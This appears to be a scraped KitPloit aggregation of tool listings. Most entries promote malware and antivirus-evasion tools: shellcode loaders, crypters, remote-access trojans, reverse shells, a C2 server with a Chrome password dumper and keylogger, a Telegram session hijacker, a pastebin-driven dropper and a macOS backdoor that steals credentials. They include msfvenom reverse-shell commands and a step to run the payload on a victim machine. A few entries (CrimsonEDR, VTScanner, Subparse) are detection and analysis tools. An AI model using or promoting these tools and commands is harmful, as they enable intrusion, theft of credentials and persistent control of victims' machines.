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Before yesterdayKitPloit - PenTest Tools!

CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R

CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.


To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone
  3. Compile the project: bash cd CrimsonEDR; chmod +x; ./

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.


To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:


For questions, feedback, or support, please reach out to me via:

Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

By: Zion3R

Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

  • Capable of bypassing some well-known antivirus (AVs).
  • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
  • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
  • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

  • Golang installed.
  • Basic understanding of shellcode operations.
  • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

To clone and run this application, you'll need Git installed on your computer. From your command line:

# Clone this repository
$ git clone
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/

After installation, you can run the tool using the following command:

./dvenom -h

  • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
  • -key: Provide the encryption key.
  • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
  • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
  • -procname: Provide the process name to be injected (default is "explorer").
  • -scfile: Provide the path to the shellcode file.

To generate c# source code that contains encrypted shellcode.

Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

Language Supported Methods Supported Encryption
C# valloc, pinject, hollow, ntinject xor, rot, aes256, rc4
Rust pinject, hollow, ntinject xor, rot, rc4
PowerShell valloc, pinject xor, rot
ASPX valloc xor, rot
VBA valloc xor, rot

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

This project is licensed under the MIT License - see the LICENSE file for details.

Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.

VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.



Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone


To initiate VTScanner, follow these steps:

cd VTScanner


  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini


VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.


VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.

TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R

Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


1. git clone
2. Now Follow the instructions in HOW TO USE Section.


1. Go to Telegram and search for
2. Create Bot and get the API_TOKEN
3. Now search for and get the chat_id
4. Now Go to and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python For Windows and python3 For Linux
6. Now Go to the bot which u created and send command in message field


HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location


1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added


Coded By: Machine1337

pyFUD - Multi Clients FUD Reverse Shell

By: Zion3R

python3 based multi clients reverse shell.


1. Don't Upload Any Payloads To Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!


1. git clone
2. python3 (enter your ip,port and start the server)
3. (Edit IP AND PORT To Put Your Own IP,Port)


1. python3
2. Now Compile to exe (make sure change ip and port in it)


1. Very Simple And Fully Undectable Reverse Shell
2. Multi Client Handling
3. Persistent Shell
3. auto-reconnect
5. U can Convert to exe using pyinstaller tool in windows.


Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

AVIator - Antivirus Evasion Project

AviAtor Ported to NETCore 5 with an updated UI



AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (


AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques


  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


The application has a form which consists of three main inputs (See screenshot bellow):

  1. A text containing the encryption key used to encrypt the shellcode
  2. A text containing the IV used for AES encryption
  3. A text containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, spoof an executable file to look like having an "innocent" extention like 'pdf', 'txt' etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc"

Beware of the fact that some AVs alert the spoof by its own as a malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST= LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine



Either compile the project or download the allready compiled executable from the following folder:


Install Mono according to your linux distribution, download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

root@kali# mono aviator.exe


To Damon Mohammadbagher for the encryption procedure


I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.

Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework

Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).


Getting Started

Software Requirements

To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.

Software Status Link
Docker Required Installation Guide
Python3.8.1 Required Installation Guide
Pyenv Recommended Installation Guide

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.

Python Requirements
Python requires some other packages to be installed that Subparse is dependent on for its processes. To get the Python set up completed navigate to the location of your Subparse installation and go to the *parser* folder. The following commands that you will need to use to install the Python requirements is:
sudo get apt install build-essential
pip3 install -r ./requirements.txt

Docker Requirements
Since Subparse uses Docker for its backend and web interface, the set up of the Docker containers needs to be completed before being able to use the program. To do this navigate to the root directory of the Subparse installation location, and use the following command to set up the docker instances:
docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.


Installation steps


Command Line Options

Command line options that are available for subparse/parser/

Argument Alternative Required Description
-h --help No Shows help menu
-d SAMPLES_DIR --directory SAMPLES_DIR Yes Directory of samples to parse
-e ENRICHER_MODULES --enrichers ENRICHER_MODULES No Enricher modules to use for additional parsing
-r --reset No Reset/delete all data in the configured Elasticsearch cluster
-v --verbose No Display verbose commandline output
-s --service-mode No Enters service mode allowing for mode samples to be added to the SAMPLES_DIR while processing

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.


General Information Collected

Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:

  • MD5 hash of the sample
  • SHA256 hash of the sample
  • Sample name
  • Sample size
  • Extension of sample
  • Derived extension of sample

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.

Default Modules

This is the default parsing module that will be executed against ELF files. Information that is collected:
  • General Information
  • Program Headers
  • Section Headers
  • Notes
  • Architecture Specific Data
  • Version Information
  • Arm Unwind Information
  • Relocation Data
  • Dynamic Tags

This is the default parsing module that will be executed against OLE and RTF formatted files, this uses the OLETools package to obtain data. The information that is collected:
  • Meta Data
  • MRaptor
  • RTF
  • Times
  • Indicators
  • VBA / VBA Macros
  • OLE Objects

This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
  • Section code and count
  • Entry point
  • Image base
  • Signature
  • Imports
  • Exports


Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules

This enrichers uses the []( API and [Malware Bazaar]( to collect more information about the sample(s) subparse is analyzing, the information is then aggregated and stored in the Elastic database.
This enrichers is used to communicate with a CAPEv2 Sandbox instance, to collect more information about the sample(s) through dynamic analysis, the information is then aggregated and stored in the Elastic database utilizing the Kafka Messaging Service for background processing.
This enricher is a smart string enricher, that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments.
This ericher uses a pre-compiled yara file located at: parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and YaraRulesProject


Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.

Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.


The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:

  • debug
  • warning
  • error
  • critical
  • exception
  • log
  • info


  • This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.

Codecepticon - .NET Application That Allows You To Obfuscate C#, VBA/VB6 (Macros), And PowerShell Source Code

Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.

Codecepticon allows you to obfuscate and rewrite code, but also provides features such as rewriting the command line as well.

Read This First

! Before we begin !

  • This documentation is on how to install and use Codecepticon only. Compilation, usage, and support for tools like Rubeus and SharpHound will not be provided. Refer to each project's repo separately for more information.

  • Codecepticon is actively developed/tested in VS2022, but it should work in VS2019 as well. Any tickets/issues created for VS2019 and below, will not be investigated unless the issue is reproducible in VS2022. So please use the latest and greatest VS2022.

  • The following packages MUST be v3.9.0, as newer versions have the following issue which is still open: dotnet/roslyn#58463

    • Microsoft.CodeAnalysis.CSharp.Workspaces
    • Microsoft.CodeAnalysis.Workspaces.MSBuild

    Codecepticon checks the version of these packages on runtime and will inform you if the version is different to v3.9.0.

  • It cannot be stressed this enough: always test your obfuscated code locally first.


Visual Studio Pro/Community 2022

Roslyn Compiler

Open and Compile

Open Codecepticon, wait until all NuGet packages are downloaded and then build the solution.

Using Codecepticon

There are two ways to use Codecepticon, either by putting all arguments in the command line or by passing a single XML configuration file. Due to the high level of supported customisations, It's not recommended manually going through --help output to try and figure out which parameters to use and how. Use CommandLineGenerator.html and generate your command quickly:

The command generator's output format can be either Console or XML, depending what you prefer. Console commands can be executed as:

Codecepticon.exe --action obfuscate --module csharp --verbose ...etc

While when using an XML config file, as:

Codecepticon.exe --config C:\Your\Path\To\The\File.xml

If you want to deep dive into Codecepticon's functionality, check out this document.

For tips you can use, check out this document.


Obfuscating a C# project is simple, simply select the solution you wish to target. Note that a backup of the solution itself will not be taken, and the current one will be the one that will be obfuscated. Make sure that you can independently compile the target project before trying to run Codecepticon against it.


The VBA obfuscation works against source code itself rather than a Microsoft Office document. This means that you cannot pass a doc(x) or xls(x) file to Codecepticon. It will have to be the source code of the module itself (press Alt-F11 and copy the code from there).


Due to the complexity of PowerShell scripts, along with the freedom it provides in how to write scripts it is challenging to cover all edge cases and ensure that the obfuscated result will be fully functional. Although it's expected for Codecepticon to work fine against simple scripts/functionality, running it against complex ones such as PowerView will not work - this is a work in progress.

Obfuscating Command Line Arguments

After obfuscating an application or a script, it is very likely that the command line arguments have also been renamed. The solution to this is to use the HTML mapping file to find what the new names are. For example, let's convert the following command line:

SharpHound.exe --CollectionMethods DCOnly --OutputDirectory C:\temp\

By searching through the HTML mapping file for each argument, we get:

And by replacing all strings the result is:

ObfuscatedSharpHound.exe --AphylesPiansAsp TurthsTance --AnineWondon C:\temp\

However, some values may exist in more than one category:

Therefore it is critical to always test your result in a local environment first.


Why isn't there a compiled version under Releases that I can download?

The compiled output includes a lot of dependency DLLs, which due to licensing requirements we can't re-distribute without written consent.

Does Codecepticon only work for C# projects that already have a supported profile?

No, Codecepticon should work with everything. The profiles are just a bit of extra tweaks that are done to the target project in order to make it more reliable and easier to work with.

But as all code is unique, there will be instances where obfuscating a project will end up with an error or two that won't allow it to be compiled or executed. In this case a new profile may be in order - please raise a new issue if this is the case.

Same principle applies to PowerShell/VBA code - although those currently have no profiles that come with Codecepticon, it's an easy task to add if some are needed.

Can I contribute?

For reporting bugs and suggesting new features, please create an issue.

For submitting pull requests, please see the Contributions section.


I'm using Codecepticon against a C# project, it runs, but afterwards I can't compile the target project.

Before running Codecepticon make sure you can compile a clean version of the target project. Very often when this issue appears, it's due to missing dependencies for the target solution rather than Codecepticon. But if it still doesn't compile:

  • Is it a public project? Create an issue and paste the link with as much detail as possible. If the tool is part of SharpCollection, even better.
  • Is it a private project? In the spirit of improving Codecepticon we'll try to provide as much support as possible via screenshots and error/debug messages. But we will not be accessing/running any clean/obfuscated code via private repos etc.

Same as above, but it's a PowerShell/VBA script - can you help?

I will do my best, but as PowerShell scripts can be VERY complex and the PSParser isn't as advanced as Roslyn for C#, no promises can be made. Same applies for VBA/VB6.

I keep getting: "Method not found: 'System.Collections.Immutable.ImmutableArray"

You may at some point encounter the following error:

Still trying to get to the bottom of this one, a quick fix is to uninstall and reinstall the System.Collections.Immutable package, from the NuGet Package Manager.


Whether it's a typo, a bug, or a new feature, Codecepticon is very open to contributions as long as we agree on the following:

  • You are OK with the MIT license of this project.
  • Before creating a pull request, create an issue so it could be discussed before doing any work as internal development is not tracked via the public GitHub repository. Otherwise you risk having a pull request rejected if for example we are already working on the same/similar feature, or for any other reason.

References / Credits

Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products

Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  1. Make Sure your payload file have all the libraries import and it will be a valid payload file

How To Use:

  1. Find Any Python Based Backdoor/RAT on github.
  2. Crypt its payload with pycrypt
  3. Now Convert crypted payload to exe using pyinstaller
  4. Enjoy


  1. Don't Upload Any Payloads To Bcz This tool will not work with Time.
  2. Virustotal Share Signatures With AV Comapnies.
  3. Again Don't be an Idiot!

KleenScan Scanner Result:-

  1. Generated Result:-
  2. Crypter Code Result:-

Download Python3:

*:- For Windows:

*:- For Linux:

  1. sudo apt-get install python3
  2. sudo apt-get install python3-pip


  1. Make Sure Python3 And Pip Installed
  2. pip install termcolor
  3. pip install requests

How To Run:-

*:- For Windows:-

  1. Make Sure python3 and pip is installed and requriements also installed
  2. python
  3. Then give the path of your payload file and enjoy

*:- For Linux:-

  1. Make Sure All Requriements is installed.
  2. python3
  3. Then enter the path of your payload file and enjoy


  1. Windows
  2. Linux Based Os

How To Install:

  1. git clone
  2. cd pycrypt
  3. python3


  1. FUD Ratio 0/40
  2. Bypass Any EDR's Solutions
  3. Lightweight Crypter
  4. Very Small And Simple Crypter


Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.

GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.

The List Of Commands It Supports :-

help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

cd --& gt; Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc

========================================================== =========================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI

Features Of Our Framework :-

Check The Video To Get A Detail Knowledge

1. The is a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time.

How To Use Our Tool :

git clone

pip3 install -r requirements.txt


It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules.

Dont Forget To Change The IP ADDRESS Manually in both and

SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering

The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it


This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
  • for developers
    you can read the source code and try to understand how to make a project like this


module Short description
Dump password steal All passwords saved , upload file a passwords saved to mega
Dump History dump browser history
dump files Steal files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works ? The recording session in Telegram is stored locally in this particular path C:\Users<pc name >\AppData\Roaming\Telegram Desktop in the 'tedata' folder
└── Users
β”œβ”€β”€ .AppData
β”‚Β Β  └── Roaming
β”‚Β Β  └── TelegramDesktop
β”‚Β Β  └── tdata

Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV

2- Dropper
  • What requirements does he need from you?
  • And how does it work?? Requirements The first thing it asks you is the URL of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct, meaning that it must be the end Its Yama .exe or .png, whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?Β 

The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere

3- Linux support

4-You can now choose between Mega or Pastebin


  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone
cd SteaLinG
pip install -r requirements.txt

Installation to Linux

git clone
cd SteaLinG
chmod +x


* Don't Upload in Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection


OSRipper - AV Evading OSX Backdoor And Crypter Framework

OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique


Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

Here are example backdoors which were generated with OSRipper

Β macOS .apps will look like this on vt

Getting Started


You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.



apt install git python -y
git clone
cd OSRipper
pip3 install -r requirements.txt


git clone
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from

Executing program

Only this

sudo python3


Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well



  • βœ…Get down detection to 0/26 on
  • βœ…Add Changelog
  • βœ…Daemonise Backdoor
  • βœ…Add Crypter
  • βœ…Add More Backdoor templates
  • βœ…Get down detection to at least 0/68 on VT (for mac malware)


  • βœ…Add AntiVM
  • [] Implement tor hidden services
  • βœ…Add Logger
  • βœ…Add Password stealer
  • [] Add KeyLogger
  • βœ…Add some new evasion options
  • βœ…Add SilentMiner
  • [] Make proper C2 server


Coming soon


Just open a issue and ill make sure to get back to you


  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release




Inspiration, code snippets, etc.


I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T


I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
